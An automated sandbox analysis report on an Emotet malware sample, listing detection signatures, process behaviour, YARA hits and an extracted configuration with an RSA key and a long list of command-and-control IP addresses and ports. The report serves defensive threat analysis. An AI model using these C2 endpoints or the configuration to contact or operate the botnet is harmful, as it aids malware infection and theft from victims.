Play interactive tour

Edit tour

Windows Analysis Report boI88C399w.exe

Overview

General Information

Sample Name:	boI88C399w.exe
Analysis ID:	437123
MD5:	0a82064af051bad014b77038d60474b6
SHA1:	f7bf190091d5fe307cfaeed630eeb341c935bda0
SHA256:	8f165a26d7e9ad72cb0d51cf01076cc4b0099a244cd4e702645d36dc788dd0cc
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

C2 URLs / IPs found in malware configuration

Drops executables to the windows directory (C:\Windows) and starts them

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to enumerate running services

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

boI88C399w.exe (PID: 7052 cmdline: 'C:\Users\user\Desktop\boI88C399w.exe' MD5: 0A82064AF051BAD014B77038D60474B6)

splwow64.exe (PID: 7072 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)

KBDHU1.exe (PID: 4780 cmdline: C:\Windows\SysWOW64\mos\KBDHU1.exe MD5: 0A82064AF051BAD014B77038D60474B6)

svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7032 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["88.153.35.32:80", "107.170.146.252:8080", "173.212.214.235:7080", "167.114.153.111:8080", "202.141.243.254:443", "75.143.247.51:80", "85.105.111.166:80", "216.139.123.119:80", "113.61.66.94:80", "162.241.140.129:8080", "190.12.119.180:443", "2.58.16.89:8080", "91.211.88.52:7080", "93.147.212.206:80", "71.15.245.148:8080", "157.245.99.39:8080", "27.114.9.93:80", "50.91.114.38:80", "174.106.122.139:80", "47.36.140.164:80", "139.162.60.124:8080", "209.54.13.14:80", "217.20.166.178:7080", "185.94.252.104:443", "72.186.136.247:443", "172.86.188.251:8080", "41.185.28.84:8080", "87.106.139.101:8080", "89.216.122.92:80", "108.46.29.236:80", "184.180.181.202:80", "173.63.222.65:80", "120.150.60.189:80", "62.30.7.67:443", "139.99.158.11:443", "220.245.198.194:80", "138.68.87.218:443", "201.241.127.190:80", "186.74.215.34:80", "190.162.215.233:80", "24.178.90.49:80", "89.121.205.18:80", "5.39.91.110:7080", "59.125.219.109:443", "182.208.30.18:443", "123.176.25.234:80", "24.137.76.62:80", "74.208.45.104:8080", "194.187.133.160:443", "37.179.204.33:80", "194.4.58.192:7080", "95.9.5.93:80", "67.170.250.203:443", "61.33.119.226:443", "96.245.227.43:80", "68.115.186.26:80", "190.108.228.27:443", "112.185.64.233:80", "176.111.60.55:8080", "91.146.156.228:80", "190.240.194.77:443", "115.94.207.99:443", "62.171.142.179:8080", "134.209.144.106:443", "168.235.67.138:7080", "124.41.215.226:80", "172.104.97.173:8080", "202.134.4.216:8080", "94.200.114.161:80", "67.163.161.107:80", "61.76.222.210:80", "97.82.79.83:80", "74.214.230.200:80", "46.105.131.79:8080", "78.188.106.53:443", "186.70.56.94:443", "120.150.218.241:443", "50.245.107.73:443", "123.142.37.166:80", "110.145.77.103:80", "61.19.246.238:443", "218.147.193.146:80", "94.230.70.6:80", "154.91.33.137:443", "104.131.11.150:443", "95.213.236.64:8080", "49.50.209.131:80", "187.161.206.24:80", "37.139.21.175:8080", "121.124.124.40:7080", "200.116.145.225:443", "24.230.141.169:80", "194.190.67.75:80", "209.141.54.221:7080", "137.59.187.107:8080", "217.123.207.149:80", "24.133.106.23:80", "79.137.83.50:443", "24.179.13.119:80", "202.134.4.211:8080", "78.24.219.147:8080", "76.175.162.101:80", "121.7.31.214:80", "62.75.141.82:80", "109.74.5.95:8080", "75.188.96.231:80", "176.113.52.6:443", "50.35.17.13:80", "118.83.154.64:443", "110.142.236.207:80", "188.219.31.12:80", "72.143.73.234:443", "102.182.93.220:80", "66.76.12.94:8080", "103.86.49.11:8080", "190.164.104.62:80", "203.153.216.189:7080", "119.59.116.21:8080", "172.105.13.66:443", "94.23.237.171:443", "49.3.224.99:8080", "139.59.60.244:8080", "172.91.208.86:80"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000003.716674491.00000000032E2000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000003.658508716.0000000000602000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.661246086.0000000000602000.00000004.00000020.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.boI88C399w.exe.62a3d0.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.boI88C399w.exe.62a3d0.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.boI88C399w.exe.2cc0000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.3.KBDHU1.exe.32e32a0.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.boI88C399w.exe.62a3d0.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.KBDHU1.exe.32e32a0.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.3.KBDHU1.exe.32e32a0.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.KBDHU1.exe.2340000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.KBDHU1.exe.32e32a0.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.3.boI88C399w.exe.62a3d0.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: boI88C399w.exe

Avira: detected

Found malware configuration

Show sources

Source: 0.3.boI88C399w.exe.62a3d0.0.unpack

Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["88.153.35.32:80", "107.170.146.252:8080", "173.212.214.235:7080", "167.114.153.111:8080", "202.141.243.254:443", "75.143.247.51:80", "85.105.111.166:80", "216.139.123.119:80", "113.61.66.94:80", "162.241.140.129:8080", "190.12.119.180:443", "2.58.16.89:8080", "91.211.88.52:7080", "93.147.212.206:80", "71.15.245.148:8080", "157.245.99.39:8080", "27.114.9.93:80", "50.91.114.38:80", "174.106.122.139:80", "47.36.140.164:80", "139.162.60.124:8080", "209.54.13.14:80", "217.20.166.178:7080", "185.94.252.104:443", "72.186.136.247:443", "172.86.188.251:8080", "41.185.28.84:8080", "87.106.139.101:8080", "89.216.122.92:80", "108.46.29.236:80", "184.180.181.202:80", "173.63.222.65:80", "120.150.60.189:80", "62.30.7.67:443", "139.99.158.11:443", "220.245.198.194:80", "138.68.87.218:443", "201.241.127.190:80", "186.74.215.34:80", "190.162.215.233:80", "24.178.90.49:80", "89.121.205.18:80", "5.39.91.110:7080", "59.125.219.109:443", "182.208.30.18:443", "123.176.25.234:80", "24.137.76.62:80", "74.208.45.104:8080", "194.187.133.160:443", "37.179.204.33:80", "194.4.58.192:7080", "95.9.5.93:80", "67.170.250.203:443", "61.33.119.226:443", "96.245.227.43:80", "68.115.186.26:80", "190.108.228.27:443", "112.185.64.233:80", "176.111.60.55:8080", "91.146.156.228:80", "190.240.194.77:443", "115.94.207.99:443", "62.171.142.179:8080", "134.209.144.106:443", "168.235.67.138:7080", "124.41.215.226:80", "172.104.97.173:8080", "202.134.4.216:8080", "94.200.114.161:80", "67.163.161.107:80", "61.76.222.210:80", "97.82.79.83:80", "74.214.230.200:80", "46.105.131.79:8080", "78.188.106.53:443", "186.70.56.94:443", "120.150.218.241:443", "50.245.107.73:443", "123.142.37.166:80", "110.145.77.103:80", "61.19.246.238:443", "218.147.193.146:80", "94.230.70.6:80", "154.91.33.137:443", "104.131.11.150:443", "95.213.236.64:8080", "49.50.209.131:80", "187.161.206.24:80", "37.139.21.175:8080", "121.124.124.40:7080", "200.116.145.225:443", "24.230.141.169:80", "194.190.67.75:80", "209.141.54.221:7080", "137.59.187.107:8080", "217.123.207.149:80", "24.133.106.23:80", "79.137.83.50:443", "24.179.13.119:80", "202.134.4.211:8080", "78.24.219.147:8080", "76.175.162.101:80", "121.7.31.214:80", "62.75.141.82:80", "109.74.5.95:8080", "75.188.96.231:80", "176.113.52.6:443", "50.35.17.13:80", "118.83.154.64:443", "110.142.236.207:80", "188.219.31.12:80", "72.143.73.234:443", "102.182.93.220:80", "66.76.12.94:8080", "103.86.49.11:8080", "190.164.104.62:80", "203.153.216.189:7080", "119.59.116.21:8080", "172.105.13.66:443", "94.23.237.171:443", "49.3.224.99:8080", "139.59.60.244:8080", "172.91.208.86:80"]}

Multi AV Scanner detection for submitted file

Show sources

Source: boI88C399w.exe	Virustotal: Detection: 81%	Perma Link
Source: boI88C399w.exe	Metadefender: Detection: 71%	Perma Link
Source: boI88C399w.exe	ReversingLabs: Detection: 89%

Machine Learning detection for sample

Show sources

Source: boI88C399w.exe

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02342650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,	5_2_02342650
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02342290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,	5_2_02342290
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02341FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptDestroyHash,CryptDuplicateHash,	5_2_02341FB0

Source: boI88C399w.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,		0_2_02CC38F0
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_023438F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,		5_2_023438F0

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 88.153.35.32:80
Source: Malware configuration extractor	IPs: 107.170.146.252:8080
Source: Malware configuration extractor	IPs: 173.212.214.235:7080
Source: Malware configuration extractor	IPs: 167.114.153.111:8080
Source: Malware configuration extractor	IPs: 202.141.243.254:443
Source: Malware configuration extractor	IPs: 75.143.247.51:80
Source: Malware configuration extractor	IPs: 85.105.111.166:80
Source: Malware configuration extractor	IPs: 216.139.123.119:80
Source: Malware configuration extractor	IPs: 113.61.66.94:80
Source: Malware configuration extractor	IPs: 162.241.140.129:8080
Source: Malware configuration extractor	IPs: 190.12.119.180:443
Source: Malware configuration extractor	IPs: 2.58.16.89:8080
Source: Malware configuration extractor	IPs: 91.211.88.52:7080
Source: Malware configuration extractor	IPs: 93.147.212.206:80
Source: Malware configuration extractor	IPs: 71.15.245.148:8080
Source: Malware configuration extractor	IPs: 157.245.99.39:8080
Source: Malware configuration extractor	IPs: 27.114.9.93:80
Source: Malware configuration extractor	IPs: 50.91.114.38:80
Source: Malware configuration extractor	IPs: 174.106.122.139:80
Source: Malware configuration extractor	IPs: 47.36.140.164:80
Source: Malware configuration extractor	IPs: 139.162.60.124:8080
Source: Malware configuration extractor	IPs: 209.54.13.14:80
Source: Malware configuration extractor	IPs: 217.20.166.178:7080
Source: Malware configuration extractor	IPs: 185.94.252.104:443
Source: Malware configuration extractor	IPs: 72.186.136.247:443
Source: Malware configuration extractor	IPs: 172.86.188.251:8080
Source: Malware configuration extractor	IPs: 41.185.28.84:8080
Source: Malware configuration extractor	IPs: 87.106.139.101:8080
Source: Malware configuration extractor	IPs: 89.216.122.92:80
Source: Malware configuration extractor	IPs: 108.46.29.236:80
Source: Malware configuration extractor	IPs: 184.180.181.202:80
Source: Malware configuration extractor	IPs: 173.63.222.65:80
Source: Malware configuration extractor	IPs: 120.150.60.189:80
Source: Malware configuration extractor	IPs: 62.30.7.67:443
Source: Malware configuration extractor	IPs: 139.99.158.11:443
Source: Malware configuration extractor	IPs: 220.245.198.194:80
Source: Malware configuration extractor	IPs: 138.68.87.218:443
Source: Malware configuration extractor	IPs: 201.241.127.190:80
Source: Malware configuration extractor	IPs: 186.74.215.34:80
Source: Malware configuration extractor	IPs: 190.162.215.233:80
Source: Malware configuration extractor	IPs: 24.178.90.49:80
Source: Malware configuration extractor	IPs: 89.121.205.18:80
Source: Malware configuration extractor	IPs: 5.39.91.110:7080
Source: Malware configuration extractor	IPs: 59.125.219.109:443
Source: Malware configuration extractor	IPs: 182.208.30.18:443
Source: Malware configuration extractor	IPs: 123.176.25.234:80
Source: Malware configuration extractor	IPs: 24.137.76.62:80
Source: Malware configuration extractor	IPs: 74.208.45.104:8080
Source: Malware configuration extractor	IPs: 194.187.133.160:443
Source: Malware configuration extractor	IPs: 37.179.204.33:80
Source: Malware configuration extractor	IPs: 194.4.58.192:7080
Source: Malware configuration extractor	IPs: 95.9.5.93:80
Source: Malware configuration extractor	IPs: 67.170.250.203:443
Source: Malware configuration extractor	IPs: 61.33.119.226:443
Source: Malware configuration extractor	IPs: 96.245.227.43:80
Source: Malware configuration extractor	IPs: 68.115.186.26:80
Source: Malware configuration extractor	IPs: 190.108.228.27:443
Source: Malware configuration extractor	IPs: 112.185.64.233:80
Source: Malware configuration extractor	IPs: 176.111.60.55:8080
Source: Malware configuration extractor	IPs: 91.146.156.228:80
Source: Malware configuration extractor	IPs: 190.240.194.77:443
Source: Malware configuration extractor	IPs: 115.94.207.99:443
Source: Malware configuration extractor	IPs: 62.171.142.179:8080
Source: Malware configuration extractor	IPs: 134.209.144.106:443
Source: Malware configuration extractor	IPs: 168.235.67.138:7080
Source: Malware configuration extractor	IPs: 124.41.215.226:80
Source: Malware configuration extractor	IPs: 172.104.97.173:8080
Source: Malware configuration extractor	IPs: 202.134.4.216:8080
Source: Malware configuration extractor	IPs: 94.200.114.161:80
Source: Malware configuration extractor	IPs: 67.163.161.107:80
Source: Malware configuration extractor	IPs: 61.76.222.210:80
Source: Malware configuration extractor	IPs: 97.82.79.83:80
Source: Malware configuration extractor	IPs: 74.214.230.200:80
Source: Malware configuration extractor	IPs: 46.105.131.79:8080
Source: Malware configuration extractor	IPs: 78.188.106.53:443
Source: Malware configuration extractor	IPs: 186.70.56.94:443
Source: Malware configuration extractor	IPs: 120.150.218.241:443
Source: Malware configuration extractor	IPs: 50.245.107.73:443
Source: Malware configuration extractor	IPs: 123.142.37.166:80
Source: Malware configuration extractor	IPs: 110.145.77.103:80
Source: Malware configuration extractor	IPs: 61.19.246.238:443
Source: Malware configuration extractor	IPs: 218.147.193.146:80
Source: Malware configuration extractor	IPs: 94.230.70.6:80
Source: Malware configuration extractor	IPs: 154.91.33.137:443
Source: Malware configuration extractor	IPs: 104.131.11.150:443
Source: Malware configuration extractor	IPs: 95.213.236.64:8080
Source: Malware configuration extractor	IPs: 49.50.209.131:80
Source: Malware configuration extractor	IPs: 187.161.206.24:80
Source: Malware configuration extractor	IPs: 37.139.21.175:8080
Source: Malware configuration extractor	IPs: 121.124.124.40:7080
Source: Malware configuration extractor	IPs: 200.116.145.225:443
Source: Malware configuration extractor	IPs: 24.230.141.169:80
Source: Malware configuration extractor	IPs: 194.190.67.75:80
Source: Malware configuration extractor	IPs: 209.141.54.221:7080
Source: Malware configuration extractor	IPs: 137.59.187.107:8080
Source: Malware configuration extractor	IPs: 217.123.207.149:80
Source: Malware configuration extractor	IPs: 24.133.106.23:80
Source: Malware configuration extractor	IPs: 79.137.83.50:443
Source: Malware configuration extractor	IPs: 24.179.13.119:80
Source: Malware configuration extractor	IPs: 202.134.4.211:8080
Source: Malware configuration extractor	IPs: 78.24.219.147:8080
Source: Malware configuration extractor	IPs: 76.175.162.101:80
Source: Malware configuration extractor	IPs: 121.7.31.214:80
Source: Malware configuration extractor	IPs: 62.75.141.82:80
Source: Malware configuration extractor	IPs: 109.74.5.95:8080
Source: Malware configuration extractor	IPs: 75.188.96.231:80
Source: Malware configuration extractor	IPs: 176.113.52.6:443
Source: Malware configuration extractor	IPs: 50.35.17.13:80
Source: Malware configuration extractor	IPs: 118.83.154.64:443
Source: Malware configuration extractor	IPs: 110.142.236.207:80
Source: Malware configuration extractor	IPs: 188.219.31.12:80
Source: Malware configuration extractor	IPs: 72.143.73.234:443
Source: Malware configuration extractor	IPs: 102.182.93.220:80
Source: Malware configuration extractor	IPs: 66.76.12.94:8080
Source: Malware configuration extractor	IPs: 103.86.49.11:8080
Source: Malware configuration extractor	IPs: 190.164.104.62:80
Source: Malware configuration extractor	IPs: 203.153.216.189:7080
Source: Malware configuration extractor	IPs: 119.59.116.21:8080
Source: Malware configuration extractor	IPs: 172.105.13.66:443
Source: Malware configuration extractor	IPs: 94.23.237.171:443
Source: Malware configuration extractor	IPs: 49.3.224.99:8080
Source: Malware configuration extractor	IPs: 139.59.60.244:8080
Source: Malware configuration extractor	IPs: 172.91.208.86:80

Source: unknown

Network traffic detected: IP country count 36

Source: global traffic	TCP traffic: 192.168.2.4:49759 -> 107.170.146.252:8080
Source: global traffic	TCP traffic: 192.168.2.4:49768 -> 173.212.214.235:7080
Source: global traffic	TCP traffic: 192.168.2.4:49769 -> 167.114.153.111:8080

Source: Joe Sandbox View

IP Address: 200.116.145.225 200.116.145.225

Source: Joe Sandbox View	ASN Name: HOSTER-KZ HOSTER-KZ
Source: Joe Sandbox View	ASN Name: AfrihostZA AfrihostZA
Source: Joe Sandbox View	ASN Name: TTNETTR TTNETTR

Source: global traffic	TCP traffic: 192.168.2.4:49746 -> 88.153.35.32:80
Source: global traffic	TCP traffic: 192.168.2.4:49770 -> 202.141.243.254:443
Source: global traffic	TCP traffic: 192.168.2.4:49773 -> 75.143.247.51:80

Source: unknown	TCP traffic detected without corresponding DNS query: 88.153.35.32
Source: unknown	TCP traffic detected without corresponding DNS query: 88.153.35.32
Source: unknown	TCP traffic detected without corresponding DNS query: 88.153.35.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.170.146.252
Source: unknown	TCP traffic detected without corresponding DNS query: 107.170.146.252
Source: unknown	TCP traffic detected without corresponding DNS query: 107.170.146.252
Source: unknown	TCP traffic detected without corresponding DNS query: 173.212.214.235
Source: unknown	TCP traffic detected without corresponding DNS query: 173.212.214.235
Source: unknown	TCP traffic detected without corresponding DNS query: 173.212.214.235
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown	TCP traffic detected without corresponding DNS query: 202.141.243.254
Source: unknown	TCP traffic detected without corresponding DNS query: 202.141.243.254
Source: unknown	TCP traffic detected without corresponding DNS query: 202.141.243.254
Source: unknown	TCP traffic detected without corresponding DNS query: 75.143.247.51
Source: unknown	TCP traffic detected without corresponding DNS query: 75.143.247.51
Source: unknown	TCP traffic detected without corresponding DNS query: 75.143.247.51

Source: svchost.exe, 0000000B.00000002.764648647.00000270E6470000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000B.00000002.764648647.00000270E6470000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000B.00000003.753034318.00000270E6B89000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-06-10T07:22:21.3909598Z\|\|.\|\|3f037643-6aef-47de-81ac-01c99fe373ef\|\|1152921505693535664\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000B.00000003.753034318.00000270E6B89000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-06-10T07:22:21.3909598Z\|\|.\|\|3f037643-6aef-47de-81ac-01c99fe373ef\|\|1152921505693535664\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
